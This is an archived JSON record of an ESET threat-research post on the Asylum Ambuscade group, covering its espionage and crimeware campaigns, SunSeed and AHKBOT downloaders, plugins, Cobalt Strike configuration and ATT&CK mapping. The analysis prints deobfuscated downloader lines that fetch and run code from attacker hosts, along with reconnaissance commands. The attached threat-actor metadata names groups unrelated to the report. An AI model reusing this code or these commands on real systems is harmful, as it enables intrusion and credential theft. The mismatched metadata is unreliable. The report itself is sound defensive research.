{
	"id": "f83cf4d7-e21d-4fd5-86aa-a7e4c864510c",
	"created_at": "2026-04-06T00:11:48.665679Z",
	"updated_at": "2026-04-10T03:37:04.1465Z",
	"deleted_at": null,
	"sha1_hash": "2da70f4bb602b1c894e4993169ed5eb99482e0a9",
	"title": "Asylum Ambuscade: crimeware or cyberespionage?",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1134014,
	"plain_text": "Asylum Ambuscade: crimeware or cyberespionage?\r\nBy Matthieu Faou\r\nArchived: 2026-04-05 19:55:52 UTC\r\nAsylum Ambuscade is a cybercrime group that has been performing cyberespionage operations on the side. They were first\r\npublicly outed in March 2022 by Proofpoint researchers after the group targeted European government staff involved in\r\nhelping Ukrainian refugees, just a few weeks after the start of the Russia-Ukraine war. In this blogpost, we provide details\r\nabout the early 2022 espionage campaign and about multiple cybercrime campaigns in 2022 and 2023.\r\nKey points of this blogpost:\r\nAsylum Ambuscade has been operating since at least 2020.\r\nIt is a crimeware group that targets bank customers and cryptocurrency traders in various regions, including North\r\nAmerica and Europe.\r\nAsylum Ambuscade also does espionage against government entities in Europe and Central Asia.\r\nMost of the group’s implants are developed in script languages such as AutoHotkey, JavaScript, Lua, Python, and\r\nVBS.\r\nCyberespionage campaigns\r\nAsylum Ambuscade has been running cyberespionage campaigns since at least 2020. We found previous compromises of\r\ngovernment officials and employees of state-owned companies in Central Asia countries and Armenia.\r\nIn 2022, and as highlighted in the Proofpoint publication, the group targeted government officials in several European\r\ncountries bordering Ukraine. We assess that the goal of the attackers was to steal confidential information and webmail\r\ncredentials from official government webmail portals.\r\nThe compromise chain starts with a spearphishing email that has a malicious Excel spreadsheet attachment. Malicious VBA\r\ncode therein downloads an MSI package from a remote server and installs SunSeed, a downloader written in Lua.\r\nNote that we observed some variations in the attachments. 
In June 2022, the group used an exploit of the Follina\r\nvulnerability (CVE-2022-30190) instead of malicious VBA code. This document is shown in Figure 1. It is written in\r\nUkrainian and the decoy is about a security alert regarding a Gamaredon (another well-known espionage group) attack in\r\nUkraine.\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 1 of 15\n\nFigure 1. Document leveraging the Follina vulnerability\r\nThen, if the machine is deemed interesting, the attackers deploy the next stage: AHKBOT. This is a downloader written in\r\nAutoHotkey that can be extended with plugins, also written in AutoHotkey, in order to spy on the victim’s machine. An\r\nanalysis of the group’s toolset is provided later in the blogpost.\r\nCybercrime campaigns\r\nEven though the group came into the spotlight because of its cyberespionage operations, it has been mostly running\r\ncybercrime campaigns since early 2020.\r\nSince January 2022, we have counted more than 4,500 victims worldwide. While most of them are located in North\r\nAmerica, as shown in Figure 2, it should be noted that we have also seen victims in Asia, Africa, Europe, and South\r\nAmerica.\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 2 of 15\n\nFigure 2. Geographical distribution of victims since January 2022\r\nThe targeting is very wide and mostly includes individuals, cryptocurrency traders, and small and medium businesses\r\n(SMBs) in various verticals.\r\nWhile the goal of targeting cryptocurrency traders is quite obvious – stealing cryptocurrency – we don’t know for sure how\r\nAsylum Ambuscade monetizes its access to SMBs. It is possible the group sells the access to other crimeware groups who\r\nmight, for example, deploy ransomware. 
We have not observed this in our telemetry, though.\r\nAsylum Ambuscade’s crimeware compromise chain is, overall, very similar to the one we describe for the cyberespionage\r\ncampaigns. The main difference is the compromise vector, which can be:\r\nA malicious Google Ad redirecting to a website delivering a malicious JavaScript file (as highlighted in this SANS\r\nblogpost)\r\nMultiple HTTP redirections in a Traffic Direction System (TDS). The TDS used by the group is referred to as 404\r\nTDS by Proofpoint. It is not exclusive to Asylum Ambuscade and we observed it was, for example, used by another\r\nthreat actor to deliver Qbot. An example of a redirection chain, captured by urlscan.io, is shown in Figure 3.\r\nFigure 3. 404 TDS redirection chain, as captured by urlscan.io – numbers indicate the redirections in sequence\r\nIn addition to the different compromise vector, the group developed SunSeed equivalents in other scripting languages such\r\nas Tcl and VBS. In March 2023, it developed an AHKBOT equivalent in Node.js that we named NODEBOT. We believe\r\nthose changes were intended to bypass detections from security products. An overview of the compromise chain is provided\r\nin Figure 4.\r\nFigure 4. Compromise chain\r\nAttribution\r\nWe believe that the cyberespionage and cybercrime campaigns are operated by the same group.\r\nThe compromise chains are almost identical in all campaigns. In particular, SunSeed and AHKBOT have been widely\r\nused for both cybercrime and cyberespionage.\r\nWe don’t believe that SunSeed and AHKBOT are sold on the underground market. 
These tools are not very\r\nsophisticated in comparison to other crimeware tools for sale, the number of victims is quite low were it a toolset\r\nshared among multiple groups, and the network infrastructure is consistent across campaigns.\r\nAs such, we believe that Asylum Ambuscade is a cybercrime group that is doing some cyberespionage on the side.\r\nWe also believe that these three articles describe incidents related to the group:\r\nA TrendMicro article from 2020: Credential Stealer Targets US, Canadian Bank Customers\r\nA Proofpoint article from 2022: Asylum Ambuscade: State Actor Uses Lua-based Sunseed Malware to Target\r\nEuropean Governments and Refugee Movement\r\nA Proofpoint article from 2023: Screentime: Sometimes It Feels Like Somebody's Watching Me\r\nMalicious JavaScript files\r\nIn most crimeware campaigns run by the group, the compromise vector is not a malicious document, but a JavaScript file\r\ndownloaded from the previously documented TDS. Note that it has to be manually executed by the victim, so the attackers\r\nare trying to entice people into clicking on the files by using filenames such as Document_12_dec-1532825.js,\r\nTeamViewer_Setup.js, or AnyDeskInstall.js.\r\nThose scripts are obfuscated using random variable names and junk code, most likely intended to bypass detections. An\r\nexample is provided in Figure 5.\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 4 of 15\n\nFigure 5. Obfuscated JavaScript downloader\r\nOnce deobfuscated, this script can be summarized in two lines:\r\nvar obj = new ActiveXObject(\"windowsinstaller.installer\");\r\nobj.InstallProduct(\"https://namesilo.my[.]id/css/ke.msi\");\r\nFirst-stage downloaders\r\nThe first stage downloaders are dropped by an MSI package downloaded by either a malicious document or a JavaScript\r\nfile. 
There are three versions of this downloader:\r\nLua (SunSeed)\r\nTcl\r\nVBS\r\nSunSeed is a downloader written in the Lua language and heavily obfuscated, as shown in Figure 6.\r\nFigure 6. The SunSeed Lua variant is heavily obfuscated\r\nOnce manually deobfuscated, the main function of the script looks like this:\r\nrequire('socket.http')\r\nserial_number = Drive.Item('C').SerialNumber\r\nserver_response = socket.request(http://84.32.188[.]96/ + serial_number)\r\npcall(loadstring(server_response))\r\ncollectgarbage()\r\n\u003cjump to the start and retry\u003e\r\nIt gets the serial number of the C: drive and sends a GET request to http://\u003cC\u0026C\u003e/\u003cserial_number\u003e using the User-Agent\r\nLuaSocket 2.0.2. It then tries to execute the reply. This means that SunSeed expects to receive additional Lua scripts from\r\nthe C\u0026C server. We found two of those scripts: install and move.\r\ninstall is a simple Lua script that downloads an AutoHotkey script into C:\\ProgramData\\mscoree.ahk and the legitimate\r\nAutoHotkey interpreter into C:\\ProgramData\\mscoree.exe, as shown in Figure 7. This AutoHotkey script is AHKBOT, the\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 5 of 15\n\nsecond stage downloader.\r\nFigure 7. Lua script that downloads an AutoHotkey script\r\nAn even simpler Lua script, move, is shown in Figure 8. It is used to reassign management of a victimized computer from\r\none C\u0026C server to another. It is not possible to update the hardcoded SunSeed C\u0026C server; to complete a C\u0026C\r\nreassignment, a new MSI installer needs to be downloaded and executed, exactly as when the machine was first\r\ncompromised.\r\nFigure 8. Lua script to move management of a compromised machine from one C\u0026C server to another\r\nAs mentioned above, we found another variant of SunSeed developed using the Tcl language instead of Lua, as shown in\r\nFigure 9. 
The main difference is that it doesn’t send the C: drive’s serial number in the GET request.\r\nFigure 9. SunSeed variant in Tcl\r\nThe third variant was developed in VBS, as shown in Figure 10. The main difference is that it doesn’t download and\r\ninterpret additional code, but downloads and executes an MSI package.\r\nFigure 10. SunSeed variant in VBS\r\nSecond-stage downloaders\r\nThe main second-stage downloader is AHKBOT, developed in AutoHotkey. As shown in Figure 11, it sends a GET request,\r\nwith the User-Agent AutoHotkey (the default value used by AutoHotkey), to http://\u003cC\u0026C\u003e/\u003cserial_number_of_C_drive\u003e-\r\nRP, almost exactly as the earlier SunSeed. RP might be a campaign identifier, as it changes from sample to sample.\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 6 of 15\n\nFigure 11. AHKBOT\r\nAHKBOT can be found on disk at various locations, such as C:\\ProgramData\\mscoree.ahk or C:\\ProgramData\\adb.ahk. It\r\ndownloads and interprets spy plugins, also developed in AutoHotkey. A summary of the 21 plugins is provided in Table 1.\r\nTable 1. SunSeed plugins\r\nPlugin name Description\r\nass\r\nDownload and execute a Cobalt Strike loader packed with VMProtect. The beacon’s configuration\r\nextracted using the tool CobaltStrikeParser is provided in the IoCs in the Cobalt Strike configuration\r\nsection.\r\nconnect Send the log message connected! to the C\u0026C server.\r\ndeletecookies\r\nDownload SQLite from /download?path=sqlite3slashsqlite3dotdll via HTTP from its C\u0026C server, then\r\ndelete browser cookies for the domains td.com (a Canadian bank) and mail.ru. We don’t know why the\r\nattackers need to delete cookies, especially for these domains. 
It’s possible it is intended to delete\r\nsession cookies to force its victims to reenter their credentials that would then be captured by the\r\nkeylogger.\r\ndeskscreen Take a screenshot using Gdip.BitmapFromScreen and send it to the C\u0026C server.\r\ndeskscreenon Similar to deskscreen but take screenshots in a 15-second loop.\r\ndeskscreenoff Stop the deskscreenon loop.\r\ndomain\r\nGather information about the Active Directory using the following commands:\r\ncmd /c chcp 65001 \u0026\u0026 net group \"domain admins\" /domain\r\ncmd /c chcp 65001 \u0026\u0026 net group \"enterprise admins\" /domain\r\ncmd /c chcp 65001 \u0026\u0026 net group \"\"Domain Computers\"\" /domain\r\ncmd /c chcp 65001 \u0026\u0026 nltest /dclist:\r\ncmd /c chcp 65001 \u0026\u0026 nltest /DOMAIN_TRUSTS\r\ncmd /c chcp 65001 \u0026\u0026 ipconfig /all\r\ncmd /c chcp 65001 \u0026\u0026 systeminfo\r\nhardware\r\nGet victim’s host information using WMI queries:\r\nSelect * from Win32_OperatingSystem\r\nSELECT * FROM Win32_LogicalDisk\r\nSELECT * FROM Win32_Processor\r\nSelect * from Win32_OperatingSystem\r\nSELECT * FROM Win32_VideoController\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 7 of 15\n\nPlugin name Description\r\nSelect * from Win32_NetworkAdapterConfiguration WHERE IPEnabled = True\r\nSelect * from FirewallProduct\r\nSelect * from AntiSpywareProduct\r\nSelect * from AntiVirusProduct\r\nSELECT * FROM Win32_Product\r\nSELECT Caption,ExecutablePath,ProcessID FROM Win32_Process where ExecutablePath is\r\nnot null\r\nand send to the C\u0026C server.\r\nhvncon\r\nDownload and execute a custom hVNC (hidden VNC) application from\r\nhttp://\u003cC\u0026C\u003e/download?path=hvncslashhvncdotzip\r\nhvncoff Stop the hVNC by executing taskkill /f /im hvnc.exe.\r\ninstallchrome\r\nDownload http://\u003cC\u0026C\u003e/download?path=chromeslashchromedotzip, a legitimate copy of Google\r\nChrome, and unpack it into 
%LocalAppData%\\Google\\Chrome\\Application. This copy of Chrome is\r\nlikely used by hVNC if the victim doesn’t have Chrome installed.\r\nkeylogon\r\nStart the keylogger, hooked input using DllCall(\"SetWindowsHookEx\", […]). The keystrokes are sent\r\nto the C\u0026C server when the active application changes.\r\nkeylogoff Stop the keylogger.\r\npasswords\r\nSteal passwords from Internet Explorer, Firefox, and Chromium-based browsers. It downloads SQLite\r\nto read the browser storages. It can also decrypt locally encrypted passwords by calling the Microsoft\r\nCryptUnprotectData function. Stolen passwords are sent to the C\u0026C server.\r\nThis plugin looks very similar to the password stealer described by Trend Micro in 2020, including the\r\nhard drive serial numbers used for debugging: 605109072 and 2786990575. This could indicate that it\r\nis still being developed on the same machines.\r\nrutservon\r\nDownload a remote access trojan (RAT) from http://\u003cC\u0026C\u003e/download?\r\npath=rutservslashagent6dot10dotexe (SHA-1:\r\n3AA8A4554B175DB9DA5EEB7824B5C047638A6A9D).\r\nThis is a commercial RAT developed by Remote Utilities LLC that provides full control over the\r\nmachine on which it is installed.\r\nrutservoff Kill the RAT.\r\nsteal Download and execute an infostealer – probably based on Rhadamanthys.\r\ntasklist List running processes by using the WMI query Select * from Win32_Process.\r\ntowake Move the mouse using MouseMove, 100, 100. This is likely to prevent the computer from going to\r\nsleep, especially given the name of the plugin.\r\nupdate\r\nDownload a new version of SunSeed AutoHotkey from the C\u0026C server and replace the current\r\nSunSeed on disk. The AutoHotkey interpreter is located in C:\\ProgramData\\adb.exe.\r\nwndlist List active windows by calling WinGet windows, List (Autohotkey syntax).\r\nThe plugins send the result back to the C\u0026C server using a log function, as shown in Figure 12.\r\nFigure 12. 
Log function\r\nIn March 2023, the attackers developed a variant of AHKBOT in Node.js that we have named NODEBOT – see Figure 13.\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 8 of 15\n\nFigure 13. NODEBOT\r\nThe attackers also rewrote some AHKBOT plugins in JavaScript to make them compatible with NODEBOT. So far, we have\r\nobserved the following plugins (an asterisk indicates that the plugin is new to NODEBOT):\r\nconnect\r\ndeskscreen\r\nhardware\r\nhcmdon (a reverse shell in Node.js)*\r\nhvncoff\r\nhvncon\r\nkeylogoff\r\nkeylogon (download and execute the AutoHotkey keylogger)\r\nmods (download and install hVNC)*\r\npasswords\r\nscreen\r\nConclusion\r\nAsylum Ambuscade is a cybercrime group mostly targeting SMBs and individuals in North America and Europe. However,\r\nit appears to be branching out, running some recent cyberespionage campaigns on the side, against governments in Central\r\nAsia and Europe from time to time.\r\nIt is quite unusual to catch a cybercrime group running dedicated cyberespionage operations, and as such we believe that\r\nresearchers should keep close track of Asylum Ambuscade activities.\r\nESET Research offers private APT intelligence reports and data feeds. 
For any inquiries about this service, visit the ESET\r\nThreat Intelligence page.\r\nIoCs\r\nFiles\r\nNetwork\r\nCobalt Strike configuration\r\nBeaconType - HTTP\r\nPort - 80\r\nSleepTime - 45000\r\nMaxGetSize - 2801745\r\nJitter - 37\r\nMaxDNS - Not Found\r\nPublicKey_MD5 - e4394d2667cc8f9d0af0bbde9e808c29\r\nC2Server - snowzet[.]com,/jquery-3.3.1.min.js\r\nUserAgent - Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Tri\r\nHttpPostUri - /jquery-3.3.2.min.js\r\nMalleable_C2_Instructions - Remove 1522 bytes from the end\r\n Remove 84 bytes from the beginning\r\n Remove 3931 bytes from the beginning\r\n Base64 URL-safe decode\r\n XOR mask w/ random key\r\nHttpGet_Metadata - ConstHeaders\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n Referer: http://code.jquery.com/\r\n Accept-Encoding: gzip, deflate\r\n Metadata\r\n base64url\r\n prepend \"__cfduid=\"\r\n header \"Cookie\"\r\nHttpPost_Metadata - ConstHeaders\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n Referer: http://code.jquery.com/\r\n Accept-Encoding: gzip, deflate\r\n SessionId\r\n mask\r\n base64url\r\n parameter \"__cfduid\"\r\n Output\r\n mask\r\n base64url\r\n print\r\nPipeName - Not Found\r\nDNS_Idle - Not Found\r\nDNS_Sleep - Not Found\r\nSSH_Host - Not Found\r\nSSH_Port - Not Found\r\nSSH_Username - Not Found\r\nSSH_Password_Plaintext - Not 
Found\r\nSSH_Password_Pubkey - Not Found\r\nSSH_Banner -\r\nHttpGet_Verb - GET\r\nHttpPost_Verb - POST\r\nHttpPostChunk - 0\r\nSpawnto_x86 - %windir%\\syswow64\\dllhost.exe\r\nSpawnto_x64 - %windir%\\sysnative\\dllhost.exe\r\nCryptoScheme - 0\r\nProxy_Config - Not Found\r\nProxy_User - Not Found\r\nProxy_Password - Not Found\r\nProxy_Behavior - Use IE settings\r\nWatermark - 206546002\r\nbStageCleanup - True\r\nbCFGCaution - False\r\nKillDate - 0\r\nbProcInject_StartRWX - False\r\nbProcInject_UseRWX - False\r\nbProcInject_MinAllocSize - 17500\r\nProcInject_PrependAppend_x86 - b'\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64 - b'\\x90\\x90'\r\n Empty\r\nProcInject_Execute - ntdll:RtlUserThreadStart\r\n CreateThread\r\n NtQueueApcThread-s\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod - NtMapViewOfSection\r\nbUsesCookies - True\r\nHostHeader -\r\nheadersToRemove - Not Found\r\nDNS_Beaconing - Not Found\r\nDNS_get_TypeA - Not Found\r\nDNS_get_TypeAAAA - Not Found\r\nDNS_get_TypeTXT - Not Found\r\nDNS_put_metadata - Not Found\r\nDNS_put_output - Not Found\r\nDNS_resolver - Not Found\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 13 of 15\n\nDNS_strategy - round-robin\r\nDNS_strategy_rotate_seconds - -1\r\nDNS_strategy_fail_x - -1\r\nDNS_strategy_fail_seconds - -1\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 13 of the MITRE ATT\u0026CK framework.\r\nTactic ID Name Description\r\nResource\r\nDevelopment\r\nT1583.003\r\nAcquire Infrastructure:\r\nVirtual Private Server\r\nAsylum Ambuscade rented VPS servers.\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nAsylum Ambuscade develops custom implants in\r\nvarious scripting languages.\r\nInitial Access\r\nT1189 Drive-by Compromise\r\nTargets were redirected via a TDS to a website\r\ndelivering a malicious JavaScript file.\r\nT1566.001\r\nPhishing: Spearphishing\r\nAttachment\r\nTargets receive malicious Excel 
or Word documents.\r\nExecution\r\nT1059.005\r\nCommand and Scripting\r\nInterpreter: Visual Basic\r\nAsylum Ambuscade has a downloader in VBS.\r\nT1059.006\r\nCommand and Scripting\r\nInterpreter: Python\r\nAsylum Ambuscade has a screenshotter in Python.\r\nT1059.007\r\nCommand and Scripting\r\nInterpreter: JavaScript\r\nAsylum Ambuscade has a downloader in JavaScript\r\n(NODEBOT).\r\nT1059\r\nCommand and Scripting\r\nInterpreter\r\nAsylum Ambuscade has downloaders in other\r\nscripting languages such as Lua, AutoHotkey, or Tcl.\r\nT1204.002\r\nUser Execution: Malicious\r\nFile\r\nTargets needs to manually execute the malicious\r\ndocument or JavaScript file.\r\nPersistence T1547.001\r\nBoot or Logon Autostart\r\nExecution: Registry Run\r\nKeys / Startup Folder\r\nSunSeed persists via a LNK file in the startup folder.\r\nDefense\r\nEvasion\r\nT1027.010\r\nObfuscated Files or\r\nInformation: Command\r\nObfuscation\r\nDownloaded JavaScript files are obfuscated with junk\r\ncode.\r\nCredential\r\nAccess\r\nT1555.003\r\nCredentials from Password\r\nStores: Credentials from\r\nWeb Browsers\r\nAHKBOT passwords plugin can steal browser\r\ncredentials.\r\nDiscovery\r\nT1087.002\r\nAccount Discovery:\r\nDomain Account\r\nAHKBOT domain plugin gathers information about\r\nthe domain using net group.\r\nT1010\r\nApplication Window\r\nDiscovery\r\nAHKBOT wndlist plugin lists the active windows.\r\nT1482 Domain Trust Discovery\r\nAHKBOT domain plugin gathers information using\r\nnltest.\r\nT1057 Process Discovery\r\nAHKBOT tasklist plugin lists the active processes\r\nusing Select * from Win32_Process.\r\nT1518.001\r\nSoftware Discovery:\r\nSecurity Software\r\nDiscovery\r\nAHKBOT hardware plugin lists security software\r\nusing Select * from FirewallProduct, Select * from\r\nAntiSpywareProduct and Select * from\r\nAntiVirusProduct.\r\nT1082\r\nSystem Information\r\nDiscovery\r\nAHKBOT wndlist plugin gets system information\r\nusing systeminfo.\r\nT1016\r\nSystem 
Network\r\nConfiguration Discovery\r\nAHKBOT wndlist plugin gets network configuration\r\ninformation using ipconfig /all.\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 14 of 15\n\nTactic ID Name Description\r\nCollection\r\nT1056.001 Input Capture: Keylogging AHKBOT keylogon records keystrokes.\r\nT1115 Clipboard Data AHKBOT keylogon monitors the clipboard.\r\nT1113 Screen Capture AHKBOT deskscreen takes screenshot.\r\nCommand and\r\nControl\r\nT1071.001\r\nApplication Layer Protocol:\r\nWeb Protocols\r\nAHKBOT (and all the other downloaders)\r\ncommunicates with the C\u0026C server via HTTP.\r\nExfiltration T1041\r\nExfiltration Over C2\r\nChannel\r\nData is exfiltrated via the C\u0026C channel.\r\nSource: https://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/"
	],
	"report_names": [
		"asylum-ambuscade-crimeware-or-cyberespionage"
	],
	"threat_actors": [
		{
			"id": "3cc6c262-df23-4075-a93f-b496e8908eb2",
			"created_at": "2022-10-25T16:07:23.682239Z",
			"updated_at": "2026-04-10T02:00:04.708878Z",
			"deleted_at": null,
			"main_name": "GhostNet",
			"aliases": [
				"GhostNet",
				"Snooping Dragon"
			],
			"source_name": "ETDA:GhostNet",
			"tools": [
				"AngryRebel",
				"Farfli",
				"Gh0st RAT",
				"Gh0stnet",
				"Ghost RAT",
				"Ghostnet",
				"Moudour",
				"Mydoor",
				"PCRat",
				"Remosh",
				"TOM-Skype"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e91dae30-a513-4fb1-aace-4457466313b3",
			"created_at": "2023-01-06T13:46:38.974913Z",
			"updated_at": "2026-04-10T02:00:03.168521Z",
			"deleted_at": null,
			"main_name": "GhostNet",
			"aliases": [
				"Snooping Dragon"
			],
			"source_name": "MISPGALAXY:GhostNet",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236a8303-bf12-4787-b6d0-549b44271a19",
			"created_at": "2024-06-04T02:03:07.966137Z",
			"updated_at": "2026-04-10T02:00:03.706923Z",
			"deleted_at": null,
			"main_name": "IRON TILDEN",
			"aliases": [
				"ACTINIUM ",
				"Aqua Blizzard ",
				"Armageddon",
				"Blue Otso ",
				"BlueAlpha ",
				"Dancing Salome ",
				"Gamaredon",
				"Gamaredon Group",
				"Hive0051 ",
				"Primitive Bear ",
				"Shuckworm ",
				"Trident Ursa ",
				"UAC-0010 ",
				"UNC530 ",
				"WinterFlounder "
			],
			"source_name": "Secureworks:IRON TILDEN",
			"tools": [
				"Pterodo"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434308,
	"ts_updated_at": 1775792224,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2da70f4bb602b1c894e4993169ed5eb99482e0a9.pdf",
		"text": "https://archive.orkl.eu/2da70f4bb602b1c894e4993169ed5eb99482e0a9.txt",
		"img": "https://archive.orkl.eu/2da70f4bb602b1c894e4993169ed5eb99482e0a9.jpg"
	}
}